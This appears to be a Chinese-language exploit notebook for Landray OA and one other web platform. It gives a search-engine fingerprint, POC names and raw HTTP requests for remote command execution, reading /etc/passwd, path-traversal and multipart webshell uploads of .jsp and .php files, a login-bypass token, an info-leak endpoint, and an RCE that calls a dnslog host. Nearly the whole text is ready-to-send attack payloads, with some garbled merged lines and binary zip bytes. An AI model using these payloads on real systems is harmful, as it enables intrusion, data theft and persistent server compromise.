🔪 是否利用过
优先级从高到低
发现日期从近到远
公司团队名_产品名_大版本号_特定小版本号_接口文件名_漏洞类型@发现日期.载荷格式

LandrayOA_Custom_SSRF_JNDI漏洞
LandrayOA_sysSearchMain_Rce漏洞
LandrayOA_Custom_FileRead漏洞

蓝凌

app=“Landray-OA系统”

poc-yaml-landray-oa-rce

https://mp.weixin.qq.com/s/O5wGyJhKcddSyiEzmvOVJA

POST /data/sys-common/treexml.tmpl HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Cmd: cat /etc/passwds_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0

poc-yaml-landray-oa-custom-jsp-fileread

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzipvar={"body":{"file":"file:///etc/passwd"}}

landray-upload

POST /sys/attachment/sys_att_main/jg_service.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 210DBSTEP V3.0    124            0              999            
DBSTEP=REJTVEVQ
OPTION=U0FWRUFTSFRNTA==
HTMLNAME=Li4vLi4vLi4vLi4vLi4vZWtwL3Jlc291cmNlL2Vsa3FmY3VmLmpzcA==
RECORDID=
DIRECTORY=
elkqfcuf182323GET /resource/elkqfcuf.jsp HTTP/1.1
Host: 
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

zhihuidiaodupingtai-upload-file-upload

POST /api/client/upload.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
Content-Type: image/jpeg99647lztkkl
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--GET /upload/lztkkl.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

landray-sysZonePersonInfo-info-leak

/sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?=&method=searchPerson&rowsize=50&orderby=&ordertype=up&s_ajax=true

landrayoa-2022-rce

/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping xxx.dnslog.cn")&type=1

landray-login-bypass

  
/sys/?outToken=MTE4M2IwYjg0ZWU0ZjU4MWJiYTAwMWM0N2E3OGIyZDk=

landray-login-bypass-rce

landray-getLoginSessionId-login-bypass

landray-getLoginSessionId-login-bypass-file-upload

landray-sysUiComponent-file-upload

蓝凌 ERP

蓝凌 OA sysUiComponent & sysUiExtend上传分析

https://mp.weixin.qq.com/s/kuKEmoqi7am98ORypTRnlQ

POST /sys/ui/sys_ui_component/sysUiComponent.do?method=getThemeInfo&s_ajax=true HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Content-Length: 533
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=epd2d4omyc4rqc5lv6c4--epd2d4omyc4rqc5lv6c4
Content-Disposition: form-data; name="file"; filename="daqdajrnx03kihusgzbt.zip"
Content-Type: application/x-zip-compressedPK;}W]]
component.iniËL±5202æÊKÌMµ-ÉÌM-.IÌ-(ÖË*.PK;}W´@¨B`htimestamps.jspÈ1ƒ0 Ы° Å,¥ŒT;Wp«|QWV’×oa|ïÖ6yu.U“[
ñã¥ë"õ {ó‘MX3?Ô¤Ó—¸æÄ3|€ØSü*¾+?nDÝ ~6ñ„¿¨oï?PK;}W]]
€component.iniPK;}W´@¨B`h€Htimestamps.jspPKwÔ
--epd2d4omyc4rqc5lv6c4--